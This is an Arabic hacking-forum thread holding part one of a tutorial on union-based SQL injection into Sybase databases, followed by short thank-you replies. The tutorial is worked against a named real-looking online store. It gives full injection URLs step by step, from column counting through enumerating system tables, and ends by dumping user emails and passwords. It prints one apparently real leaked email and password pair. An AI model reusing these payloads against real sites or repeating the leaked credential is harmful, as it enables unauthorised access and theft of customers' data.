حالة الموضوع:
مغلق
  1. Mohmad

    Mohmad Developer

    الأنتساب:
    ‏29 نوفمبر 2012
    المشاركات:
    17
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاتة

    الصلاة و السلام على أشرف المرسليـن

    الحمد لله وحده نحمده و نشكره و نستعينه و نستغفره و نعود بالله من شرور أنفسنا و من سيئات أعمالنا

    من يهده الله فلا مظل له و من يظلل فلن تجد له ولياً مرشدا

    و أشهد ألا إلاه إلا الله وحده لا شريك له و أن محمداً عبده و رسوله صلى الله عليه و سلم

    و على آله و صحبه أجمعين و من تبعهم بإحسان إلى يوم الدين

    اليوم سوف اقوم بشرح حقن قواعد Sybase

    ان شاء الله

    في البداية قم بقرائه بسيطه حولها

    http://ar.wikipedia.org/wiki/%D8%B3%...A8%D9%8A%D8%B2

    سأقوم بشرح طريقتين للحقن فيما يخص هذا النوع من القاعدة السايبيز
    سنتطرق الى جزئين

    الجزء الاول : حقن قواعد Sybase عن طريق Union Based .
    و
    الجزء الثاني : حقن قواعد Sybase عن طريق Error Based .

    الآن نتطرق الى الجزء الأول
    نبدأ على البركة

    لاحظ عدنا موقع التالي

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226
    نقوم بالطريقه الاعتياديه بوضح اشارة سنكل كويت وهي '
    لاحظ الخاطأ الذي ضهر

    من خلال الأستعلام الخطأ الضاهر تبين لنا بان القاعده نوعها sybase
    لاحظ الي بالمستطيل الأحمر
    الآن أصبح لدينا يقين بأن القاعدة من نوع sybase

    الآن نأتي نحقن بالطريقة الاعتيادية
    ونقوم باستخراج عدد الاعمده

    باستخدام الامر order by
    نجرب هالأستعلام لآحظ على الموقع

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20order%20by%201--
    لا يوجد حظ )2:"

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20order%20by%2010--
    ضهر الخطأ
    كما نلاحظ في الصورة الآتية

    لاحظ هنا الخطأ
    يقولك هنا العدد او الرقم خارج الحلقه التابعة للجدول يعني مابي
    طيب نقلل

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20order%20by%207-- 
    ظهر الخطأ ونفس الرسالة 
    http
    ://store.organicgrown.com/index.php?action=product&id=226%20order%20by%205--
    ظهر الخطأ وبنفس الرسالة
    http
    ://store.organicgrown.com/index.php?action=product&id=226%20order%20by%203-- 
    لا يوجد خطأ
    هنا تبين لنا ان عدد الاعمدة هي 3

    طيب الان نأتي الى اضهار الاعمده المصابة
    باستخدام الأستعلام التالي

    كود PHP:
    union select num,num,etc...--
    ليصبح الرابط بهذا الشكل

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=226%20union%20select%201,2,3--

    لاحظ الصورة الي في الأعلى ظهور خطأ غريب
    طيب تعال إنفسر هالخطأ
    هنا القاعدة تخاطبنة وتقول إن نوع البيانات من النوع VARCHAR
    الي تكون بداخل القاعده
    وانت تقوم بإدخال بيانات من نوع int
    فالاخير يقول استخدم دالة تحولك من نصي إلى رقمي
    مع العلم إن

    VARCHAR = قيمه نصيه قصيره لا تتجاوز 255 حرف
    int (intger) i = تعني قيه رقميه

    طيب هنا في طريقتين بدون استخدام دوال التحويل والا أي شي مثل ما قالت القاعدة

    الطريقه الاولى هوه استبدال مكان الاعمده الرقميه بقيمه فارغه والتي هي
    null = وهذه تعتبر قيمة نصية وتعبر بقيمه فارغة ...
    اما الثانيه هي نقوم بوضع الارقام بين علامتي تنصيص ''

    لأن عدنا قاعدة في php
    انو اذا كان الرقم يكتب مابين علامتي تنصيص يعتبر نصي وليس رقمي اذا كنت تريده رقمي تكتب الرقم مباشر .

    وانا افضل الطريقه الثانيه لأن الطريقة الثانية نستطيع تحديد عدد الاعمده بها بشكل واضح وتضهر لدينا الاعمده المصابه بالصفحه
    اما ألاولى نقوم بتخمين على مكان العمود المصاب لذلك افضل الثانية

    طيب
    نلاحظ كيف

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20%271%27,%272%27,null--

    [​IMG]


    نلاحظ هنا ظهور العمود 1 و 2 مما يدل على انها مصابة .
    طيب
    لو استبدلنا القيمه النصيه الي هيه null الموجودة بالعمود الثالث
    برقم بين علامتي تنصيص سيظهر الخطأ مما يدل على ان العمود الثالث غير مصاب
    اترك التجربه لك

    الان عرفنا الاعمده المصابه نكمل الحقنة
    نقوم بأستخراج اصدار القاعدة بالامر @@version
    لاحظ

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20@@version,%272%27,null--


    كما نلاحظ في الصوره اصدار القاعده
    الان نستخرج الجداول الموجودة داخل القاعدة لسايبير
    باستخدام union select

    ونضع مكان العمود المصاب **** = يعني اسم الجدول الاول
    مع الحاق آخر الحقنة بــ from+sysobjects = من نواة قاعدة السايبيز

    لتصبح الحقنة بهذا الشكل

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20****,%272%27,null+from+sysobjects--
    [​IMG]

    لاحظ ضهور اول جدول في القاعده وهو
    ec_employeetype
    طيب الان نقوم باستخراج الجداول البقيه الي يهمنا جدول اليوزر طيب لاحظ كيف

    هنا راح نستخدم استعلام بسيط وهو

    كود PHP:
    where ****!='table ****'  يعني اجلبلي اسم الجدول الي بعدة عدى الجدول الفلاني الي وضعنا بين علامتي تنصيص
    لاحظ كيف تصبح الحقنه

    كود PHP:
    store.organicgrown.com/index.php?action=product&id=-226  union select  ****,'2',null+from+sysobjects+where+****!='ec_employeetype' and  ****!='ec_giftcards' and ****!='ec_itemcategories' and  ****!='ec_optionlist' and ****!='ec_productoptions' and  ****!='ec_products' and ****!='ec_transactionlines' and  ****!='ec_transactions' and ****!='ec_trnslog' --
    [​IMG]

    هنا ظهر لنا جدول اليوزر الي هو ec_users

    طيب نكمل الحقنه باستخراج اعمدة الجدول تبع اليوزر
    عملية استخراج الاعمده نفس عملية استخراج اسماء الجداول
    مع مراعاة تغير الازم لاحظ

    نضع مكان العمود المصاب ****
    ونقوم بالحاق اخر الحقنه بالاستعلام الآتي

    كود PHP:
    from syscolumns where id=(select id from sysobjects where ****='table ****')
    كود PHP:
    id هنا يقصد به ترتيب الجداول الي مرقمة في القاعدة 
    from syscolumns where 
    =  من اعمدة نواة القاعدة السيبايس 
    select id from sysobjects where 
    ****='table ****' = (اختيار الترتيب من  نواة قاعده السيبايس اينما وجدت الجدول (ونقصد بالجدول المقصود ولنفرض جدول  اليوزر
    لتصبح الحقنة بهذا الشكل

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20****,%272%27,null%20from%20syscolumns%20where%20id=%28select%20id%20from%20sysobjects%20where%20****=%27ec_users%27%29--
    [​IMG]

    كما نلاحظ استخراج اول عمود للجدول اليوزر كما في الصوره التي في الاعلى
    ولاستخراج بقية الاعمدة نستخدم الاستعلام

    كود PHP:
    and ****!='column **** '      
    نكمل عالسريع الحقنه بعد الوصول الى الاعمده المطلوبه
    لاحظ الحقنه

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20****,%272%27,null%20from%20syscolumns%20where%20id=%28select%20id%20from%20sysobjects%20where%20****=%27ec_users%27%29%20and%20****!=%27rowid%27%20and%20****!=%27usertype%27%20and%20****!=%27first****%27%20and%20****!=%27last****%27%20and%20****!=%27company****%27%20and%20****!=%27phone%27%20and%20****!=%27fax%27%20and%20****!=%27email%27%20and%20****!=%27address%27%20and%20****!=%27city%27%20and%20****!=%27state%27%20and%20****!=%27zip%27%20and%20****!=%27country%27%20and%20****!=%27password%27--
    الان نقوم با ستخراج بيانات الاعمدة
    بوضع العمود المستخرج مكان العمود المصاب وبالحاق اخر الحقنه بجدول اليوزر يعني تكون الحقنه بالشكل النهائي هكذا

    كود PHP:
    http://store.organicgrown.com/index.php?action=product&id=-226%20union%20select%20email,password,null%20from%20ec_users--
    [​IMG]

    وكما تلاحظ بالصور الاميل والباسورد لجدول اليوزر
    [email protected] = الأميل
    Hsd3z76 = بسوورد
    الى هنا انتهى الجزء الاول من الموضوع اسف ادري طولت

    انتضرونا في الجزء الثاني :{y.}

     
  2. خَـلـوٍوٍدٍي

    خَـلـوٍوٍدٍي Active DeveloPer

    الأنتساب:
    ‏10 أكتوبر 2012
    المشاركات:
    95
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    يعطيك الف عافية يا غالى

    واصل يا مبدع *:"
     
  3. D 1 r k

    D 1 r k DeveloPer Plus

    الأنتساب:
    ‏9 ابريل 2012
    المشاركات:
    141
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    18
    الوظيفة:
    Currently Student
    الإقامة:
    United States
    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    مشكور وما قصرت ً#ٌ5oًًًُ.
     
  4. Тĥẻ GỌ∂FДТн€Ř

    Тĥẻ GỌ∂FДТн€Ř DeveloPer Plus

    الأنتساب:
    ‏15 يوليو 2012
    المشاركات:
    118
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    18
    الإقامة:
    SaFŘỌTỌ
    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    مشكور يا غالي على المجهود الكبير ..

    الله يعطيك العافيه
     
  5. ! ـآوتآر !

    ! ـآوتآر ! DeveloPer Plus

    الأنتساب:
    ‏19 يوليو 2012
    المشاركات:
    192
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    الإقامة:
    السـ جــــده ـعوديـة
    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    موضوع اكثر من رائع واصل بدون فواصل ً#ٌ5oًًًُ.
     
  6. VeRoS_Dz

    VeRoS_Dz Developer

    الأنتساب:
    ‏10 أغسطس 2012
    المشاركات:
    37
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الوظيفة:
    VeRoS_Dz
    الإقامة:
    VeRoS_Dz
    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    مشكور على الطرح يا غالي
    لا تحرمنا من جديدك يا بطل
     
  7. Ahmed Alqurashi

    Ahmed Alqurashi Developer

    الأنتساب:
    ‏14 ديسمبر 2011
    المشاركات:
    14
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    مشكور أخي عل جهودك . ^:"
     
  8. NETJOURNAL

    NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,543
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    يعطيك الف عافية ...
     
  9. NETJOURNAL

    NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,543
    نقاط الجائزة:
    93
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    )5:")5:")5:")5:")5:"
     
  10. ÐβĽŎM

    ÐβĽŎM Developer

    الأنتساب:
    ‏7 مارس 2012
    المشاركات:
    57
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    المخالفات
    3
    رد: الجزء الاول : حقن قواعد Sybase عن طريق Union Based

    مبدع اخي

    واصل ابداعك
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة